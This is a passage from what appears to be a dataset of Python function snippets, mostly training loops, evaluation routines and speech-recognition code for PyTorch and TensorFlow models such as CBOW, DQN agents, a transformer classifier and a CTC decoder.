variable if needed\r\n model=CBOW(len(unique_vocab), EMBEDDING_DIM, CONTEXT_SIZE)\r\n if USE_ADAM:\r\n print('Using adam as optimizer')\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n else:\r\n print('Using SGD as optimizer')\r\n optimizer = torch.optim.SGD(model.parameters(), lr=0.001)\r\n\r\n checkpoint_file ='checkpoint.pth'\r\n checkpoint_available= os.path.exists(checkpoint_file)\r\n if checkpoint_available:\r\n model, optimizer, current_epoch = reset_model_to_checkpoint(model, optimizer, checkpoint_file)\r\n else:\r\n print('no checkpoint found. initializing new model..\\n')\r\n current_epoch=0 \r\n\r\n executor = MODEL_EXECUTOR(model)\r\n if RESUME_TRAINING or not checkpoint_available:\r\n print('resuming training...\\n')\r\n import time\r\n start_time = time.time()\r\n cbow = executor.train(optimizer, data, unique_vocab, word_to_idx, current_epoch, checkpoint_file)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n else:\r\n print('pre-trained model loaded. no further training...\\n')\r\n\r\n # get two words similarity\r\n executor.test(unique_vocab,word_to_idx)\r\n\r\n show_closest_words(cbow, word_to_idx,unique_vocab)", "def main():\r\n # Read dataset.\r\n reader = DatasetReader\r\n train_filename = sys.argv[1]\r\n test_filename = train_filename.replace('_train_', '_dev_')\r\n term_index, tag_index, train_data, test_data = reader.ReadData(train_filename, test_filename)\r\n (train_terms, train_tags, train_lengths) = train_data\r\n (test_terms, test_tags, test_lengths) = test_data\r\n\r\n model = SequenceModel(train_tags.shape[1], len(term_index), len(tag_index))\r\n model.build_inference()\r\n model.build_training()\r\n for j in range(5):\r\n model.train_epoch(train_terms,train_tags, train_lengths)\r\n print('Finished epoch %i. Evaluating ...' 
% (j+1))\r\n model.evaluate(test_terms, test_tags, test_lengths)", "def training_phase(self):\r\n self.train_dataloader = self.get_dataloader(\r\n hdf_path=self.train_h5_path,\r\n data_description=\"training set\"\r\n )\r\n self.valid_dataloader = self.get_dataloader(\r\n hdf_path=self.valid_h5_path,\r\n data_description=\"validation set\"\r\n )\r\n\r\n self.get_ts_properties()\r\n\r\n self.initialize_output_files()\r\n\r\n start_epoch, end_epoch = self.define_model_and_optimizer()\r\n\r\n print(\"* Beginning training.\", flush=True)\r\n n_processed_batches = 0\r\n for epoch in range(start_epoch, end_epoch):\r\n\r\n self.current_epoch = epoch\r\n n_processed_batches = self.train_epoch(n_processed_batches=n_processed_batches)\r\n\r\n # evaluate model every `sample_every` epochs (not every epoch)\r\n if epoch % self.C.sample_every == 0:\r\n self.evaluate_model()\r\n else:\r\n util.write_model_status(score=\"NA\") # score not computed\r\n\r\n self.print_time_elapsed()", "def run_epoch(self):\n self.model_lr_scheduler.step()\n\n print(\"Training\")\n self.set_train()\n\n for batch_idx, inputs in enumerate(self.train_loader):\n\n before_op_time = time.time()\n\n outputs, losses = self.process_batch(inputs)\n\n self.model_optimizer.zero_grad()\n losses[\"loss\"].backward()\n self.model_optimizer.step()\n\n duration = time.time() - before_op_time\n\n # log less frequently after the first 2000 steps to save time & disk space\n early_phase = self.step < 2000\n late_phase = self.step % 2000 == 0\n\n if early_phase or late_phase:\n self.log_time(batch_idx, duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n self.log(\"train\", inputs, outputs, losses)\n self.val()\n\n self.step += 1", "def training_step(self):\n self.iteration += 1\n # if not enough replay memories\n if self.iteration < self.params.min_replays:\n # skip training\n return\n # sample memories\n states_val, action_val, rewards, next_state_val, continues \\\n = (rl.tools.sample_memories(self.memory, self.params.batch_size))\n # evaluate the target q\n target_q = self.sess.run(self.graph.target_q_values, feed_dict={self.graph.states: next_state_val})\n # if using double q\n if self.params.double_q:\n online_q = self.sess.run(self.graph.online_q_values, feed_dict={self.graph.states: next_state_val})\n actions = np.argmax(online_q, axis=1)\n max_next_q_values = target_q[np.arange(actions.shape[0]), actions].reshape(-1, 1)\n else:\n max_next_q_values = np.max(target_q, axis=1, keepdims=True)\n # train the online DQN\n td_target = rewards + continues * self.params.discount_factor * max_next_q_values\n _, self.loss_val = self.sess.run([self.graph.training_op, self.graph.loss],\n feed_dict={self.graph.states: states_val, self.graph.actions: action_val,\n self.graph.td_target: td_target})\n # copy to target\n if self.params.copy_interval is None or (\n self.params.copy_interval and (self.iteration % self.params.copy_interval == 0)):\n self.sess.run(self.graph.copy_online_to_target)", "async def train(self):", "def run( self ):\n # ---- Startup/Shutdown ----\n with self:\n\n # ---- Optionally reload from previous run ----\n if self.config.neuron.reload:\n self.reload()\n else:\n self.checkpoint()\n\n # --- Run until n_epochs ----\n while self.epoch < self.config.neuron.n_epochs:\n try:\n # ---- Train state ----\n self.run_epoch()\n\n # ---- Set weights on chain ----\n self.set_mechanism_weights()\n\n # ---- Checkpoint state ----\n self.checkpoint()\n\n except 
KeyboardInterrupt:\n # --- User ended session ----\n break\n\n except Exception as e:\n # --- Unknown error ----\n logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())\n if self.config.neuron.restart_on_failure == True:\n logger.info('Restarting from last saved state.')\n self.reload()\n else:\n break", "def run(num_epochs, encoded_dim):\n # for patient_ in get_patient_ids():\n for patient_ in ['16']:\n print(\"Starting on index: \" + str(patient_))\n training_ae(num_epochs, encoded_dim, patient_, True)\n print(\"Completed \" + str(patient_) + \" reconstruction and encoding, saved test data to assess performance\")", "def train(self, session, train_examples, dev_examples, train_dir):\n\n # some free code to print out number of parameters in your model\n # it's always good to check!\n # you will also want to save your model parameters in train_dir\n # so that you can use your trained model to make predictions, or\n # even continue training\n\n tic = time.time()\n params = tf.trainable_variables()\n num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))\n toc = time.time()\n logging.info(\"Number of params: %d (retreival took %f secs)\" % (num_params, toc - tic))\n\n if self.summary_flag:\n self.train_writer = tf.summary.FileWriter(self.summaries_dir + '/train', session.graph)\n\n logging.info(\"Train Loss File: {}\".format(self.train_loss_log))\n logging.info(\"Dev Loss File: {}\".format(self.dev_loss_log))\n best_score = 100000\n train_log = open(self.train_loss_log, \"w\")\n dev_log = open(self.dev_loss_log, \"w\")\n for epoch in range(self.n_epoch):\n print(\"Epoch {:} out of {:}\".format(epoch + 1, self.n_epoch))\n dev_score = self.run_epoch(session, train_examples, dev_examples, epoch, train_log)\n dev_log.write(\"{},{}\\n\".format(epoch + 1, dev_score))\n logging.info(\"Average Dev Cost: {}\".format(dev_score))\n logging.info(\"train F1 & EM\")\n f1, em = self.evaluate_answer(session, train_examples, self.rev_vocab, log = True)\n logging.info(\"Dev F1 & EM\")\n f1, em = self.evaluate_answer(session, dev_examples, self.rev_vocab, log = True)\n if dev_score < best_score:\n best_score = dev_score\n print(\"New best dev score! 
Saving model in {}\".format(train_dir + \"/\" + self.model_name))\n self.saver.save(session, train_dir + \"/\" + self.model_name)\n\n return best_score", "def run(self):\n self.__engine = engine = pyttsx.init()\n if self.__voice_id is not None:\n engine.setProperty('voice', self.__voice_id)\n engine.connect('finished-utterance', self.__next_utterance)\n engine.say('Starting voice process')\n engine.startLoop()", "def train(self, iters, n_episodes):\n for i in range(iters):\n self.self_play(n_episodes)\n self.learn()", "def evaluate(self, model, data):\n model.eval()\n\n loss = self.loss\n loss.reset()\n match = 0\n total = 0\n correct_spk = 0\n total_response = 0\n y_true = np.array([])\n y_pred = np.array([])\n\n device = None if torch.cuda.is_available() else -1\n batch_iterator = torchtext.data.BucketIterator(\n dataset=data, batch_size=self.batch_size,\n sort=True, sort_key=lambda x: len(x.src),\n device=device, train=False)\n tgt_vocab = data.fields[seq2seq.tgt_field_name].vocab\n pad = tgt_vocab.stoi[data.fields[seq2seq.tgt_field_name].pad_token]\n\n for batch in batch_iterator:\n input_variables, input_lengths = getattr(batch, seq2seq.src_field_name)\n target_variables, target_lengths = getattr(batch, seq2seq.tgt_field_name)\n spk_inputs = [getattr(batch, str(i)) for i in range(self.args.num_sentence)]\n\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(),\n target_variables, input_spk=spk_inputs)\n\n # Predict Speaker:\n target_spk = spk_inputs[-1]\n target_lengths = target_lengths.cpu().numpy()\n prob_per_spk = []\n for i in range(self.args.num_spk):\n spk_inputs_predict = Variable(torch.LongTensor(np.full((1,batch.batch_size), i)).clone())\n if self.args.cuda: spk_inputs_predict = spk_inputs_predict.cuda()\n spk_inputs_ = [getattr(batch, str(idx)) for idx in range(self.args.num_sentence-1)]\n spk_inputs_.append(spk_inputs_predict)\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(),\n target_variables, input_spk=spk_inputs_)\n prob_per_responce = []\n target = target_variables.transpose(0,1)\n for word, prob in zip(target[1:], decoder_outputs):\n word, prob = word.data.cpu().numpy(), prob.data.cpu().numpy()\n indices = zip(np.arange(len(word)), word)\n prob_per_word = [prob[i] for i in indices] # select the prob for *sentence_len* times\n prob_per_responce.append(prob_per_word)\n prob_per_spk.append([np.sum(prob_per_responce[:i]) for i in target_lengths])\n prob_per_spk = np.transpose(prob_per_spk) # output: (batch_size, num_spk), every element is the log prob for responce\n\n predicts = np.argmax(prob_per_spk, axis=1)\n correct_spk += (predicts == target_spk.data.cpu().numpy()).sum()\n total_response += len(batch.tgt[0])\n\n # Evaluation\n seqlist = other['sequence']\n for step, step_output in enumerate(decoder_outputs):\n target = target_variables[:, step + 1]\n loss.eval_batch(step_output.view(target_variables.size(0), -1), target)\n\n non_padding = target.ne(pad)\n correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0]\n match += correct\n total += non_padding.sum().data[0]\n\n y_pred = np.append(y_pred, predicts)\n y_true = np.append(y_true, target_spk.data.cpu().numpy())\n\n print(y_pred.shape)\n\n print(accuracy_score(y_true, y_pred))\n print(confusion_matrix(y_true, y_pred))\n\n if total == 0:\n accuracy = float('nan')\n else:\n accuracy = match / total\n\n if total_response == 0:\n accuracy_spk = float('nan')\n else:\n accuracy_spk = correct_spk / total_response\n\n 
return loss.get_loss(), accuracy, accuracy_spk", "def run_one_step_simvodis(self):\n self.model_lr_scheduler.step()\n self.set_train()\n\n inputs = next(iter(self.train_loader))\n\n before_op_time = time.time()\n\n outputs, losses = self.process_batch(inputs)\n\n self.model_optimizer.zero_grad()\n losses[\"loss\"].backward()\n self.model_optimizer.step()\n\n duration = time.time() - before_op_time\n\n if self.arguments[\"iteration\"] % (self.opt.save_frequency // 2) == 0:\n self.log_time(self.arguments[\"iteration\"], duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n self.log(\"train\", inputs, outputs, losses)\n self.val()\n\n self.step += 1", "def self_training(args):\n\n print('load pre-trained model from [%s]' % args.load_model, file=sys.stderr)\n params = torch.load(args.load_model, map_location=lambda storage, loc: storage)\n vocab = params['vocab']\n transition_system = params['transition_system']\n saved_args = params['args']\n saved_state = params['state_dict']\n\n # transfer arguments\n saved_args.cuda = args.cuda\n saved_args.save_to = args.save_to\n saved_args.train_file = args.train_file\n saved_args.unlabeled_file = args.unlabeled_file\n saved_args.dev_file = args.dev_file\n saved_args.load_decode_results = args.load_decode_results\n args = saved_args\n\n update_args(args)\n\n model = Parser(saved_args, vocab, transition_system)\n model.load_state_dict(saved_state)\n\n if args.cuda: model = model.cuda()\n model.train()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n print('load unlabeled data [%s]' % args.unlabeled_file, file=sys.stderr)\n unlabeled_data = Dataset.from_bin_file(args.unlabeled_file)\n\n print('load decoding results of unlabeled data [%s]' % args.load_decode_results, file=sys.stderr)\n decode_results = pickle.load(open(args.load_decode_results))\n\n labeled_data = Dataset.from_bin_file(args.train_file)\n dev_set = Dataset.from_bin_file(args.dev_file)\n\n print('Num. examples in unlabeled data: %d' % len(unlabeled_data), file=sys.stderr)\n assert len(unlabeled_data) == len(decode_results)\n self_train_examples = []\n for example, hyps in zip(unlabeled_data, decode_results):\n if hyps:\n hyp = hyps[0]\n sampled_example = Example(idx='self_train-%s' % example.idx,\n src_sent=example.src_sent,\n tgt_code=hyp.code,\n tgt_actions=hyp.action_infos,\n tgt_ast=hyp.tree)\n self_train_examples.append(sampled_example)\n print('Num. self training examples: %d, Num. 
labeled examples: %d' % (len(self_train_examples), len(labeled_data)),\n file=sys.stderr)\n\n train_set = Dataset(examples=labeled_data.examples + self_train_examples)\n\n print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)\n print('vocab: %s' % repr(vocab), file=sys.stderr)\n\n epoch = train_iter = 0\n report_loss = report_examples = 0.\n history_dev_scores = []\n num_trial = patience = 0\n while True:\n epoch += 1\n epoch_begin = time.time()\n\n for batch_examples in train_set.batch_iter(batch_size=args.batch_size, shuffle=True):\n batch_examples = [e for e in batch_examples if len(e.tgt_actions) <= args.decode_max_time_step]\n\n train_iter += 1\n optimizer.zero_grad()\n\n loss = -model.score(batch_examples)\n # print(loss.data)\n loss_val = torch.sum(loss).data[0]\n report_loss += loss_val\n report_examples += len(batch_examples)\n loss = torch.mean(loss)\n\n loss.backward()\n\n # clip gradient\n if args.clip_grad > 0.:\n grad_norm = torch.nn.utils.clip_grad_norm(model.parameters(), args.clip_grad)\n\n optimizer.step()\n\n if train_iter % args.log_every == 0:\n print('[Iter %d] encoder loss=%.5f' %\n (train_iter,\n report_loss / report_examples),\n file=sys.stderr)\n\n report_loss = report_examples = 0.\n\n print('[Epoch %d] epoch elapsed %ds' % (epoch, time.time() - epoch_begin), file=sys.stderr)\n # model_file = args.save_to + '.iter%d.bin' % train_iter\n # print('save model to [%s]' % model_file, file=sys.stderr)\n # model.save(model_file)\n\n # perform validation\n print('[Epoch %d] begin validation' % epoch, file=sys.stderr)\n eval_start = time.time()\n eval_results = evaluation.evaluate(dev_set.examples, model, args, verbose=True)\n dev_acc = eval_results['accuracy']\n print('[Epoch %d] code generation accuracy=%.5f took %ds' % (epoch, dev_acc, time.time() - eval_start), file=sys.stderr)\n is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)\n history_dev_scores.append(dev_acc)\n\n if is_better:\n patience = 0\n model_file = args.save_to + '.bin'\n print('save currently the best model ..', file=sys.stderr)\n print('save model to [%s]' % model_file, file=sys.stderr)\n model.save(model_file)\n # also save the optimizers' state\n torch.save(optimizer.state_dict(), args.save_to + '.optim.bin')\n elif epoch == args.max_epoch:\n print('reached max epoch, stop!', file=sys.stderr)\n exit(0)\n elif patience < args.patience:\n patience += 1\n print('hit patience %d' % patience, file=sys.stderr)\n\n if patience == args.patience:\n num_trial += 1\n print('hit #%d trial' % num_trial, file=sys.stderr)\n if num_trial == args.max_num_trial:\n print('early stop!', file=sys.stderr)\n exit(0)\n\n # decay lr, and restore from previously best checkpoint\n lr = optimizer.param_groups[0]['lr'] * args.lr_decay\n print('load previously best model and decay learning rate to %f' % lr, file=sys.stderr)\n\n # load model\n params = torch.load(args.save_to + '.bin', map_location=lambda storage, loc: storage)\n model.load_state_dict(params['state_dict'])\n if args.cuda: model = model.cuda()\n\n # load optimizers\n if args.reset_optimizer:\n print('reset optimizer', file=sys.stderr)\n optimizer = torch.optim.Adam(model.inference_model.parameters(), lr=lr)\n else:\n print('restore parameters of the optimizers', file=sys.stderr)\n optimizer.load_state_dict(torch.load(args.save_to + '.optim.bin'))\n\n # set new lr\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n # reset patience\n patience = 0", "def loop(self, 
epochs, train_loader, val_loader, test_loader):\n\n        self.all_epoch = epochs\n        self._resume()\n\n        for ep in range(self.cur_epoch, epochs + 1):\n            self.cur_epoch = ep\n\n            # conduct training, validation and test\n            self.train_loss = self.train(train_loader)\n            if ep % self.val_freq == 0:\n                self.val_loss = self.val(val_loader)\n\n            if ep % self.test_freq == 0:\n                self.test_loss, rho, nmse = self.test(test_loader)\n            else:\n                rho, nmse = None, None\n\n            # conduct saving, visualization and log printing\n            self._loop_postprocessing(rho, nmse)", "def train_many(command, drinks = {'none':'none'}, flavors = ['none']):\n    try:\n        flavors.remove('flavor_strength') #don't need to train for flavor_strength\n    except:\n        pass\n    stt = stt_google\n    amounts = ['0.1', '-0.1']\n    filenames = ['command_training.csv', 'drink_training.csv', 'flavor_training.csv']\n##    if (drinks != {'none':'none'}):\n##        filenames.append('drink_training1.csv')\n##    if (flavors != ['none']):\n##        filenames.append('flavor_training1.csv')\n    csvfiles = []\n    writers = []\n    for index, filename in enumerate(filenames):\n        currfile = open(filename, 'ab')\n        csvfiles.append(currfile)\n        writers.append(csv.writer(currfile))\n    if(command == 'alter' and not ('bad' in flavors) and not ('good' in flavors)):\n        currfile = open('amount_training.csv', 'ab')\n        csvfiles.append(currfile)\n        writers.append(csv.writer(currfile))\n    # record instances until it doesn't interpret any text\n    has_speech = True\n    while(has_speech):\n        for drink in drinks:\n            if(not has_speech):\n                break\n            for flavor in flavors:\n                if(not has_speech):\n                    break\n                try:\n                    if(drinks[drink].level_of(flavor) == 0):\n                        #don't train if it doesn't have the flavor\n                        continue\n                except:\n                    pass\n                for amount in amounts:\n                    labels = [command, drink, flavor]\n##                    if (drinks != {'none':'none'}):\n##                        labels.append(drink)\n##                    if(flavors != ['none']):\n##                        labels.append(flavor)\n                    if(command == 'alter' and not ('bad' in flavors) and not ('good' in flavors)):\n                        labels.append(amount)\n                    _print_instructions(command, drink, flavor, amount)\n                    speech = stt.listen_for_speech()\n                    if(not speech):\n                        has_speech = False\n                        break\n                    hypotheses = []\n                    for hypothesis in speech:\n                        hypotheses.append(hypothesis['utterance'])\n                    #write hypotheses\n                    for index, label in enumerate(labels):\n                        writers[index].writerow([label] + hypotheses)\n    for csvfile in csvfiles:\n        csvfile.close()", "def train(self, iterations=1):\n        for _ in range(iterations):\n            self.trainer.train()\n            self.test_network()", "def train(self):\n\t\tprint(\"Training...\")\n\t\tprev_loss = self.compute_loss(self.w0, self.w, 'train')\n\t\tfor i in range(self.max_iter):\n\t\t\t# gradient descent\n\t\t\tdw0, dw = self.compute_grad(self.w0, self.w, 'train')\n\t\t\tself.w0 -= self.step_size * dw0\n\t\t\tself.w = [wj-self.step_size*dwj for wj, dwj in zip(self.w, dw)]\n\t\t\tcurr_loss = self.compute_loss(self.w0, self.w, 'train')\n\t\t\tif i%(self.max_iter/10)==0:\n\t\t\t\tprint('iteration: {}, loss: {}'.format(i, curr_loss))\n\t\t\tif abs(curr_loss-prev_loss) < self.tolerance:\n\t\t\t\tprint('# of iterations:',i)\n\t\t\t\tbreak\n\t\tself.trained = True\n\t\tprint('Mean log loss of TRAIN data:', curr_loss)", "def _recognise_speech() -> None:\n    recogniser: Recogniser = SpeechRecogniser(\n        JackRobot(\n            SpeechEngine(\n            )\n        )\n    )\n\n    while True:\n        recogniser.run()", "def go(arg):\n    # load the IMDB data\n    if arg.final:\n        train, test = datasets.IMDB.splits(TEXT, LABEL)\n\n        TEXT.build_vocab(train, max_size=arg.vocab_size - 2)\n        LABEL.build_vocab(train)\n\n        train_iter, test_iter = 
data.BucketIterator.splits((train, test), batch_size=arg.batch_size,\n device=d())\n else:\n tdata, _ = datasets.IMDB.splits(TEXT, LABEL)\n train, test = tdata.split(split_ratio=0.8)\n\n TEXT.build_vocab(train, max_size=arg.vocab_size - 2) # - 2 to make space for <unk> and <pad>\n LABEL.build_vocab(train)\n\n train_iter, test_iter = data.BucketIterator.splits((train, test), batch_size=arg.batch_size,\n device=d())\n\n print(f'- nr. of training examples {len(train_iter)}')\n print(f'- nr. of {\"test\" if arg.final else \"validation\"} examples {len(test_iter)}')\n\n if arg.max_length < 0:\n mx = max([input.text[0].size(1) for input in train_iter])\n mx = mx * 2\n print(f'- maximum sequence length: {mx}')\n else:\n mx = arg.max_length\n\n # create the model\n model = Transformer(k=arg.dim_model, heads=arg.num_heads, depth=arg.depth,\n num_tokens=arg.vocab_size, num_classes=NUM_CLS)\n use_cuda = torch.npu.is_available() and not arg.cpu\n device = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')\n\n model = model.to(f'npu:{NPU_CALCULATE_DEVICE}')\n\n opt = Adam(params=model.parameters(), lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0, amsgrad=False)\n sch = torch.optim.lr_scheduler.LambdaLR(opt, lambda i: min(i / (arg.lr_warmup / arg.batch_size), 1.0))\n\n # training loop\n seen = 0\n for e in range(arg.num_epochs):\n\n print(f'\\n epoch {e}')\n model.train(True)\n for batch in tqdm.tqdm(train_iter):\n\n opt.zero_grad()\n\n input = batch.text[0].to(f'npu:{NPU_CALCULATE_DEVICE}')\n label = batch.label - 1\n label = label.to(f'npu:{NPU_CALCULATE_DEVICE}')\n\n if input.size(1) > mx:\n input = input[:, :mx]\n out = model(input)\n loss = F.nll_loss(out, label)\n\n loss.backward()\n\n # clip gradients\n # - If the total gradient vector has a length > 1, we clip it back down to 1.\n if arg.gradient_clipping > 0.0:\n nn.utils.clip_grad_norm_(model.parameters(), arg.gradient_clipping)\n\n opt.step()\n sch.step()\n\n seen += input.size(0)\n # tbw.add_scalar('classification/train-loss', float(loss.item()), seen)\n\n with torch.no_grad():\n\n model.train(False)\n tot, cor = 0.0, 0.0\n\n for batch in test_iter:\n\n input = batch.text[0]\n label = batch.label - 1\n\n if input.size(1) > mx:\n input = input[:, :mx]\n out = model(input).argmax(dim=1)\n\n tot += float(input.size(0))\n cor += float((label == out).sum().item())\n\n acc = cor / tot\n print(f'-- {\"test\" if arg.final else \"validation\"} accuracy {acc:.3}')\n # tbw.add_scalar('classification/test-loss', float(loss.item()), e)\n for batch in test_iter:\n input = batch.text[0]\n label = batch.label - 1\n\n if input.size(1) > mx:\n input = input[:, :mx]\n print(input)", "def recog_ctconly_lang(args):\n\n logging.warning(f'RECOGCTCONLYLANG')\n logging.warning(f'all_langs {args.train_langs}')\n logging.warning(\"experimental API for custom LMs is selected by --api v2\")\n if args.batchsize > 1:\n raise NotImplementedError(\"multi-utt batch decoding is not implemented\")\n if args.streaming_mode is not None:\n raise NotImplementedError(\"streaming mode is not implemented\")\n if args.word_rnnlm:\n raise NotImplementedError(\"word LM is not implemented\")\n\n set_deterministic_pytorch(args)\n model, train_args = load_trained_model(args.model)\n\n assert isinstance(model, ASRInterface)\n model.eval()\n\n load_inputs_and_targets = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=False,\n sort_in_input_length=False,\n preprocess_conf=train_args.preprocess_conf\n if args.preprocess_conf is None\n else args.preprocess_conf,\n 
preprocess_args={\"train\": False},\n )\n\n if args.ngpu == 1:\n device = \"cuda\"\n else:\n device = \"cpu\"\n dtype = getattr(torch, args.dtype)\n logging.info(f\"Decoding device={device}, dtype={dtype}\")\n model.to(device=device, dtype=dtype).eval()\n\n # logging.warning(f'Recog deep [model.args] {model.args}')\n\n with open(args.recog_json, \"rb\") as f:\n recog_json = json.load(f)[\"utts\"]\n\n if args.recog_size is not None and args.recog_size > 0:\n random.seed(args.seed)\n items = list(recog_json.items())\n random.shuffle(items)\n recog_json = OrderedDict(items[:args.recog_size])\n logging.warning(f'data json len {len(recog_json)}')\n\n use_sortagrad = model.args.sortagrad == -1 or model.args.sortagrad > 0\n\n converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)\n\n # make minibatch list (variable length)\n recog = make_batchset(\n recog_json,\n 16, # model.args.batch_size,\n model.args.maxlen_in,\n model.args.maxlen_out,\n model.args.minibatches,\n min_batch_size=model.args.ngpu if model.args.ngpu > 1 else 1,\n shortest_first=use_sortagrad,\n count=model.args.batch_count,\n batch_bins=400000, #model.args.batch_bins,\n batch_frames_in=model.args.batch_frames_in,\n batch_frames_out=model.args.batch_frames_out,\n batch_frames_inout=model.args.batch_frames_inout,\n iaxis=0,\n oaxis=0,\n )\n load_rc = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=True,\n preprocess_conf=model.args.preprocess_conf,\n preprocess_args={\"train\": False}, # Switch the mode of preprocessing\n )\n\n recog_iter = ChainerDataLoader(\n dataset=TransformDataset(\n recog, lambda data: converter([load_rc(data)]), utt=True, lang_onehot=True, all_lang=args.train_langs\n ),\n batch_size=1,\n num_workers=model.args.n_iter_processes,\n shuffle=not use_sortagrad,\n collate_fn=lambda x: x[0],\n )\n\n\n logging.info(f'Character list: {model.args.char_list}')\n\n decoder = CTCBeamDecoder(\n labels=model.args.char_list, beam_width=args.beam_size, log_probs_input=True\n )\n\n with open(args.recog_json, \"rb\") as f:\n js = json.load(f)[\"utts\"]\n new_js = {}\n\n for batch in recog_iter:\n names, x = batch[0], batch[1:]\n\n # logging.warning(f\"Recog deep [names] {names}\")\n x = _recursive_to(x, device)\n\n langs, xs_pad, ilens, ys_pad = x\n logging.warning(f'parameters, names {names}')\n logging.warning(f'parameters, langs {langs}')\n # logging.warning(f'parameters, names {names}')\n logprobs, seq_lens = model.encode_with_length(langs, xs_pad, ilens)\n\n # logging.warning(f'Recog Deep [logprobs] {logprobs.size()}')\n out, scores, offsets, seq_lens = decoder.decode(logprobs, seq_lens)\n for hyp, trn, length, name, score in zip(out, ys_pad, seq_lens, names, scores): # iterate batch\n # logging.warning(f'{score}')\n best_hyp = hyp[0,:length[0]]\n\n new_js[name] = add_results_to_json(\n js[name], [{\"yseq\": best_hyp, \"score\": float(score[0])}], model.args.char_list\n )\n\n\n # logging.warning(f'Recog deep [new_js] {new_js}')\n # break\n\n # raise\n with open(args.result_label, \"wb\") as f:\n f.write(\n json.dumps(\n {\"utts\": new_js}, indent=4, ensure_ascii=False, sort_keys=True\n ).encode(\"utf_8\")\n )", "def run(self):\n params = self.params\n\n # load data\n self.data = self.load_data()\n # check if loaded classification data set is using the same dict as pretrained model\n if not self.data['dico'] == self._embedder.dico:\n self.compare_dict(self.data['dico'], self._embedder.dico)\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in 
the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']),\n len(self._embedder.dico)))\n\n # embedder\n self.encoder = copy.deepcopy(self._embedder)\n self.encoder.cuda()\n\n # projection layer: CHANGE 3 to your number of classes output\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.encoder.out_dim, params.clf_output_dim)\n ]).cuda()\n\n # optimizers: use different optimizers to tune embedding layer and projection layer\n self.optimizer_e = get_optimizer(list(self.encoder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n best_acc = 0\n eval_metric = \"CLF_valid_en_acc\"\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"CLF - Training epoch %i ...\" % epoch)\n self.train()\n\n # evaluation\n logger.info(\"CLF - Evaluating epoch %i ...\" % epoch)\n with torch.no_grad():\n scores = self.eval()\n if scores[eval_metric] > best_acc:\n logger.info('New best score for %s: %.6f' % (eval_metric, scores[eval_metric]))\n self.save_checkpoint('best-%s' % eval_metric)\n self.decrease_counts = 0\n best_acc = scores[eval_metric]\n else:\n logger.info(\"Not a better validation score (%i / %i).\"\n % (self.decrease_counts, self.decrease_counts_max))\n self.decrease_counts += 1\n if self.decrease_counts > self.decrease_counts_max:\n logger.info(\"Stopping criterion has been below its best value for more \"\n \"than %i epochs. Ending the experiment...\" % self.decrease_counts_max)\n exit()\n self.scores.update(scores)", "def train(self):\n\n if(self.net.killAll):\n self._kill()\n\n empty = False\n state = []\n actions = []\n rewards = []\n while(not empty):\n example = self.globalQueue.get()\n \n for prevState, action, reward in zip(example['prevStates'], example['actions'],example['rewards']):\n state.append(np.array(prevState).reshape(-1,84,84,4))\n actions.append(np.eye(self.actionSpace)[np.array(action)].reshape(-1,self.actionSpace).astype(np.float32))\n rewards.append(np.array(reward).reshape(-1))\n empty = self.globalQueue.empty()\n \n if(len(rewards) != 0 ):\n states = np.array(state).reshape(-1, 84,84,4)\n actions = np.array(actions).reshape(-1,self.actionSpace)\n rewards = np.array(rewards).reshape(-1)\n self.net.train(states, rewards, actions)", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def training_step(self):\n self.iteration += 1\n # if not enough replay memories\n if self.iteration < self.params.min_replays:\n # skip training\n return\n # for each batch\n for _ in range(self.params.num_batches):\n # sample memories\n mem_states, mem_controls, mem_rewards, mem_next_states, mem_continues = \\\n 
